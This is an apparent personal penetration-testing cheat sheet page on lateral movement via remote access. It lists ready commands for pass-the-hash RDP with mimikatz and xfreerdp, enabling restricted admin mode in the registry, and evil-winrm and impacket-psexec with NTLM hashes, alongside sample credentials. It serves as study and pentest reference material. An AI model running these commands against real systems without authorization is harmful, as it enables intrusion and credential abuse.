VulnableOne
  • 🧘‍♂️About Me
  • Offensive Treasure
    • 🧌Penetration Testing
      • Reconnaissance
        • Identify Ports/Hosts/Data
      • Enumeration
        • Service Ports
          • FTP (21)
          • SSH (22)
          • SMTP (25)
          • DNS (53)
          • TFTP (69/udp)
          • Finger (79)
          • SaMBa (139/445)
          • RPC/NFS (111/135)
          • SNMP (161/udp)
          • LDAP (389)
          • isakmp (500/udp)
          • Java (1099)
          • MS-SQL (1433)
          • MySQL (3306)
          • Distcc (3622)
          • PostgreSQL (5437)
          • Redis (6379)
      • Password Attack
        • Wordlist
        • Brute-Force
        • Crack Hash
      • File Transfer
        • Linux
        • Window
      • Misc
    • 🧙‍♂️AD Attack
      • Domain Enumeration
        • PowerView
        • AD-Module
        • Bloodhound
      • Abuse ACLs
        • GenericAll
        • GenericWrite
        • WriteDACL
        • ForceChangePassword
      • Kerberos Attack
        • Kerberoasting
        • ASREPRoasting
        • Unconstrained Delegation
        • Constrained Delegation
        • Resource Based Constrained Delegation
      • LAPs
      • MS SQL Servers
        • PowerUpSQL
        • SQL Server Management
        • Impacket-MSSQL
    • 🥷Red Team
      • Reconnaissance
        • Active Scanning
          • Scanning IP Blocks
          • Vulnerability Scanning
          • Wordlist Scanning
        • Gather Victim Host Information
          • Software
        • Gather Victim Identity Information
          • Credentials
          • Email Addresses
        • Search Open Websites/Domains
          • Social Media
          • Search Engines
          • Code Repositories
        • Search Victim-Owned Websites
      • Resource Development
        • C2 Infrastructure
        • Metasploit
      • Execution
        • Bash - Reverse Shell
        • HTA
        • JScript Dropper
        • Macro
        • Metasploit
        • Network Tools
        • Powershell
        • Python
        • VBA
        • Web Shell
        • WSH
      • Persistence
        • Logon Script
        • Startup Folder
        • WinLogon (Elevated)
        • Run / RunOnce (Elevated)
        • Scheduled Tasks (Elevated )
      • Privilege Escalation
        • Windows
          • SeBackup / SeRestore
          • SeTakeOwnership
          • SeImpersonate / SeAssignPrimaryToken
          • UAC Bypass
          • AutoInstall Elevate
          • Unquoted Service Paths
          • Weak Service Permissions
          • Weak Service Binary Permissions
        • Linux
          • Escalation
      • Defense Evasion
        • Bypassing AV
          • Pack Shellcode
        • Security Control
          • CLM
          • AppLocker
        • Use Alternate Authentication Material
          • Pass The Hash
          • Over Pass The Hash
          • Extract Tickets
          • Pass The Ticket
        • Impersonate
      • Credential Access
        • Adversary-in-the-Middle
          • LLMNR/NBT-NS/MDNS Poisoning
          • Evil SSDP
        • OS Credential Dumping
          • Protected LSASS
          • Invoke-Mimikatz
          • Mimikatz.exe
          • Secretsdump
          • Meterpreter Kiwi
          • Registry
          • Shadow Copy
          • DCSync
        • Steal or Forge Kerberos Tickets
          • Silver Ticket
          • Golden Ticket
        • Steal Web Session Cookie
      • Lateral Movement
        • Remote Access
        • Pivoting
          • Linux
          • Window
    • Web Application
      • Basic Recon
  • Blog
    • 📝Empty!!!
  • Course Review
    • 👨‍🎓Cyber Security Courses Journey
      • PNPT Journey
      • OSCP Journey
        • 🚩CTF
          • Hack The Box
            • Linux Boxes
              • ✅Admirer (Easy)
              • ✅Bashed (Easy)
              • ✅Beep (Easy)
              • ✅Blocky (Easy)
              • ✅FriendZone (Easy)
              • ✅Irked (Easy)
              • ✅Lame (Easy)
              • ✅Mirai (Easy)
              • ✅Networked (Easy)
              • ✅Nibbles (Easy)
              • ✅OpenAdmin (Easy)
              • ✅Sense (Easy)
              • ✅Shocker (Easy)
              • ✅Sunday (Easy)
              • ✅Tabby (Easy)
              • ✅Traverxec (Easy)
              • ✅Valentine (Easy)
              • ✅Cronos (Medium)
              • ✅Haircut (Medium)
              • ✅Jarvis (Medium)
              • ✅Magic (Medium)
              • ✅Nineveh (Medium)
              • ✅Node (Medium)
              • ✅Poison (Medium)
              • ✅SolidState (Medium)
              • ✅TartarSauce (Medium)
            • Window Boxes
              • ✅Arctic (Easy)
              • ✅Active (Easy)
              • ✅Blue (Easy)
              • ✅Bounty (Easy)
              • ✅Devel (Easy)
              • ✅Forest (Easy)
              • ✅Granny (Easy)
              • ✅Granpa (Easy)
              • ✅Jerry (Easy)
              • ✅Legacy (Easy)
              • ✅Optimum (Easy)
              • ✅Bastard (Medium)
              • ✅Silo (Medium)
          • Buffer Overflow
            • BOF - Tib3rius
            • BOF - TCM
              • 1- Spiking
              • 2- Fuzzing
              • 3- Finding Offset
              • 4- Overwriting EIP
              • 5- Finding Bad Characters
              • 6- Finding the Right Module
              • 7- Generating Shellcode
Powered by GitBook
On this page
  • Remote Desktop
  • xfreeRDP
  • mshta on Windows
  • rdesktop
  • Winrs Access
  • PSSession Remoting
  • ScriptBlock
  • Evil-WinRM
  • Impacket
  1. Offensive Treasure
  2. Red Team
  3. Lateral Movement

Remote Access

Remote Desktop

If we only have the password hash, we can still use it for remote desktop if we enable restricted admin mode.

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

On Windows, it required to perform PTH with mimikatz

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:vulnableone /ntlm:9e7c6b33d9a2dfc1c9aef53eb2837b32 /run:"mstsc.exe /restrictedadmin"

xfreeRDP

xfreerdp /v:10.10.10.10 /u:administrator /w:1820 /h:768 /cert-ignore
xfreerdp /v:10.10.10.10 /u:administrator /cert-ignore /pth:4f9163ca3b673adfff2828f368ca3763
xfreerdp /v:10.10.10.10 /u:administrator /w:1820 /h:768 /d:vulnableone.local +clipboard

mshta on Windows

mstsc.exe /RestrictedAdmin /v:$hostname
mstsc.exe /v:$hostname

rdesktop

rdesktop 10.10.10.10 -u admin -p password -d vulnableone.local
rdesktop -g 95% -u khan.chanthou -p Password123 10.10.10.10 -x m -P -z

Winrs Access

C:\> winrs -r:pp-mgmt cmd

PSSession Remoting

PS C:\> $mgmt = New-PSSession pp-mgmt
PS C:\> Enter-PSSession $mgmt

PS C:\> Enter-PSSession -ComputerName FileServer -ConfigurationName j_sk12

PS C:\> $cred = Get-Credential
PS C:\> Enter-PSSession -ComputerName 10.10.10.10 -Authentication Negotiate -Credential $cred

ScriptBlock

Invoke-Command -ScriptBlock {hostname;whoami} -ComputerName pp-mgmt

Evil-WinRM

evil-winrm -i $ip -u khan.chanthou -p Password123!
evil-winrm -i $ip -u khan.chanthou -H 89a3a7550ce8c505c2d46b5e39d6f802

Impacket

# PSExec
impacket-psexec vulnableone/khan.chanthou@10.10.10.10 -hashes :1b951bc4fdc5dfcd148161420b9c6207
impacket-psexec vulnableone/khan.chanthou@10.10.10.10
impacket-psexec vulnableone.local/administrator@10.10.10.10 -k -no-pass
PsExec.exe -accepteula \\pp-dc.vulnableone.local cmd

# MSSQL
impacket-mssqlclient -windows-auth vulnableone/sqlsvc@10.10.10.10
impacket-mssqlclient sql01.vulnableone.local -k
impacket-mssqlclient sa:SecureSecret@10.10.10.10
PreviousLateral MovementNextPivoting

Last updated 11 months ago

🥷